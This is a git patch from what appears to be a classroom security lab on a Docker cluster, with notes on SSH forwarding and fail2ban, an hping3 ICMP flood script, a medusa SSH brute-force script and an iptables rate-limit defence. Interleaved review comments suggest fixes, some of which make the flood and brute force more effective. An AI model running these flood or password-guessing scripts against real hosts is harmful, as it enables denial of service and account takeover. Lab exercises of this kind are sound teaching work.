From 3da4ef188f8d179a0d0a49dcef2c7a410a86ba40 Mon Sep 17 00:00:00 2001
From: petroskaridis
Date: Wed, 27 Jan 2021 12:39:35 +0000
Subject: [PATCH] Upload files to ''

---
 docker notes.txt | 62 +++++++++++++++++++++++++++++++++++++++++
 fail2baninfo.txt | 7 +++++
 master_icmp_ddos.sh | 15 ++++++++++
 ssh_medusa.sh | 8 ++++++
 worker_ddos_firewall.sh | 23 +++++++++++++++
 5 files changed, 115 insertions(+)
 create mode 100644 docker notes.txt
 create mode 100644 fail2baninfo.txt
 create mode 100644 master_icmp_ddos.sh
 create mode 100644 ssh_medusa.sh
 create mode 100644 worker_ddos_firewall.sh

diff --git a/docker notes.txt b/docker notes.txt
new file mode 100644
index 0000000..b988b23
--- /dev/null
+++ b/docker notes.txt
@@ -0,0 +1,62 @@
+../install/usr/share/swarmlab.io/sec/swarmlab-sec up size=5
+../install/usr/share/swarmlab.io/sec/swarmlab-sec login
+
+
+
+
+/*ssh local forwarding*/
+{
+sudo apt install lynx -y (προγραμμα για link σε ένα host port)
+sudo apt install apache2 -y (κατεβασμα apache στον worker που θα κάνει forward)
+apache2ctl start (εκκίνηση apache server)
+
+lynx localhost
+netstat -antlupe|grep 80
+ssh docker@workerforw -L 5000:workerforw:80 (σύνδεση στην υπηρεσία από οποιοδήποτε container)
+
+lynx http://localhost:5000
+}
+
+/*ssh remote forwarding*/
+{
+ssh -R 5000:localhost:80 docker@remotehost (execute at container with service on port 80)
+lynx localhost:5000 (execute at remotehost)
+}
+
+
+
+
+{
+inventory.yml
+run.sh
+test.yml
+} after all clusters' ips are in inventory, we go:
+
+chmod +x ./run.sh
+./run.sh
+
+
+
+
+
+
+
+
+
+/*shut down cluster*/
+../install/usr/share/swarmlab.io/sec/swarmlab-sec down
+
+
+#in case docker images are full
+docker rmi -f $(docker images -a -q)
+docker rm -f $(docker container -a -q)
+
+/*fail2ban config*/
+{
+filter (fail2ban looks for the sshd service)
+logpath (stores all authentication attempts made)
+maxretry (bans IP after 4 wrong passwords)
+bantime (86400 = 1 day)
+ignoreip (type sys admin ip here)
+}
+
diff --git a/fail2baninfo.txt b/fail2baninfo.txt
new file mode 100644
index 0000000..c9a7f2f
--- /dev/null
+++ b/fail2baninfo.txt
@@ -0,0 +1,7 @@
+[sshd]
+enabled = true
+port = ssh
+filter = sshd
+logpath = /var/log/auth.log
+maxretry = 4
+bantime = 86400
diff --git a/master_icmp_ddos.sh b/master_icmp_ddos.sh
new file mode 100644
index 0000000..5bf619b
--- /dev/null
+++ b/master_icmp_ddos.sh
@@ -0,0 +1,15 @@
+sudo apt update
+sudo apt upgrade -y
+sudo apt install hping3 -y
+netip=$(ifconfig|grep inet|sed -n 1p|awk "{print \$2}"|cut -f 1-3 -d "."|sed 's/$/.*/')
+clear
+echo "Target network: " $netip
+#Find worker1 victim IP
+worker1=$(nmap -sP $netip|grep my_project_worker_1.my_project_net|awk '{print $NF}'|tr -d '()')
+#Ddos attack to worker1 with syn flood at port 80 and icmp protocol
+echo "Initiate attack towards worker 1 with IP: "$worker1
+sudo hping3 -p 80 --flood --icmp $worker1
+
+
+
+
diff --git a/ssh_medusa.sh b/ssh_medusa.sh
new file mode 100644
index 0000000..8fb01bc
--- /dev/null
+++ b/ssh_medusa.sh
@@ -0,0 +1,8 @@
+sudo apt update
+sudo apt upgrade -y
+sudo apt install medusa -y
+echo "Finding victim worker IP"
+netip=$(ifconfig|grep inet|sed -n 1p|awk "{print \$2}"|cut -f 1-3 -d "."|sed 's/$/.*/')
+worker1=$(nmap -sP $netip|grep my_project_worker_1.my_project_net|awk '{print $NF}'|tr -d '()')
+echo "Starting ssh brute force attack with medusa"
+medusa -u docker -P dictionary.txt -h $worker1 -M ssh
diff --git a/worker_ddos_firewall.sh b/worker_ddos_firewall.sh
new file mode 100644
index 0000000..a1a4d9e
--- /dev/null
+++ b/worker_ddos_firewall.sh
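Review bot: The `[sshd]` jail sets no `ignoreip`, so the administrator's own address is bannable for a full day after four failed logins — the accompanying notes even say to put the sysadmin IP there, but the committed config omits it. Add `ignoreip = 127.0.0.1/8 ::1 <admin-ip>` under `[sshd]`, and consider an explicit `findtime = 600` so the retry window is stated in the file rather than inherited from the distribution default. It is also worth a comment that `logpath = /var/log/auth.log` presumes a syslog daemon is writing that file; in a container-based lab like this one sshd may only log to stdout or the journal, in which case the jail silently never triggers — confirm with `fail2ban-client status sshd` after a deliberate failed login.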
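Review bot: `$worker1` is passed to hping3 without any check that the `nmap`/`grep` lookup actually matched, so if `my_project_worker_1.my_project_net` is absent from the scan output the final line runs with an empty target, and once a flood does start nothing bounds it because `--flood` runs until killed. Guard and bound it: `[ -n "$worker1" ] || { echo "worker1 not found in $netip" >&2; exit 1; }` followed by `sudo timeout 60s hping3 --flood --icmp "$worker1"`. `-p 80` has no effect in `--icmp` mode, so the comment about a "syn flood at port 80" does not describe what the command does; either drop `-p 80` or use `-S -p 80` if a SYN flood is what the exercise wants. The `netip` derivation takes the first `inet` line of `ifconfig`, which also matches `inet6` and may land on the loopback interface depending on interface ordering — `ip -4 -o addr show eth0` is more robust, and the script should open with `#!/usr/bin/env bash` and `set -euo pipefail` instead of depending on whatever shell invokes it. Since the target is chosen automatically, a top-of-file comment stating that this is only for the swarmlab exercise network and must never be pointed outside it would be appropriate.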
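Review bot: The `medusa` invocation runs even when the preceding lookup yields nothing and regardless of whether `dictionary.txt` exists in the current directory, so a miss produces an opaque medusa error instead of a clear one; add `[ -n "$worker1" ] && [ -r dictionary.txt ] || { echo "missing target or dictionary.txt" >&2; exit 1; }` before it and quote the target: `medusa -u docker -P dictionary.txt -h "$worker1" -M ssh -f`. `-f` stops after the first valid credential instead of grinding through the rest of the list. With the companion fail2ban jail at `maxretry = 4`, the attacking address is banned after four failures, so later attempts are blocked by the firewall rather than evaluated by sshd — if the exercise wants the brute force to run to completion, lower concurrency (`-t 1`) and/or exempt this host via `ignoreip` on the target, and say so in a comment. The `netip` pipeline is copied verbatim from master_icmp_ddos.sh, including its reliance on the first `inet` line of `ifconfig`; factoring it into a shared helper would keep the two scripts from drifting apart.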
@@ -0,0 +1,23 @@
+sudo apt update
+sudo apt upgrade -y
+#Find worker1 IP
+worker1=$(ifconfig|grep inet|sed -n lp|awk "{print \$2}")
+clear
+sudo iptables -F
+echo "2 sec ICMP packet sniffing"
+sleep 2s
+sudo timeout 2s tcpdump -i eth0 icmp $worker1
+sleep 2s
+echo "New iptables rules"
+#clean iptables rules from previous script runs
+sudo iptables -X
+sudo iptables -N icmp_flood
+sudo iptables -A INPUT -p icmp -j icmp_flood
+#limit icmp_flood to 1 packets per second
+sudo iptables -A icmp_flood -m limit --limit 1/s --limit-burst 3 -j RETURN
+sudo iptables -A icmp_flood -j DROP
+sleep 2s
+echo "2 sec ICMP packet sniffing after iptables config"
+sleep 2s
+sudo timeout 2s tcpdump -i eth0 icmp $worker1
+
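Review bot: `sed -n lp` on the `worker1=` line is a typo for `sed -n 1p` (letter l instead of digit 1), so sed rejects the expression and `$worker1` ends up empty; this goes unnoticed only because the two `tcpdump` lines then receive no host and fall back to capturing all ICMP. Even with the typo fixed, `icmp $worker1` is not a valid pcap filter — the host needs an explicit primitive — so the three lines should read `worker1=$(ifconfig | grep inet | sed -n 1p | awk '{print $2}')` and, for both captures, `sudo timeout 2s tcpdump -i eth0 "icmp and host $worker1"`. `sudo iptables -F` at the top flushes every rule in every built-in chain, not just what this script created; prefer removing only the `icmp_flood` chain and its INPUT jump (delete the jump, flush the chain, then `-X icmp_flood`), which also makes the later bare `-X` unnecessary. Because `-A INPUT` appends, the jump to `icmp_flood` is only reached if no earlier INPUT rule already accepts ICMP, and the limit currently applies to every ICMP type, including echo-reply and destination-unreachable messages the host itself relies on — matching `--icmp-type echo-request` would confine the rate limit to the attack traffic.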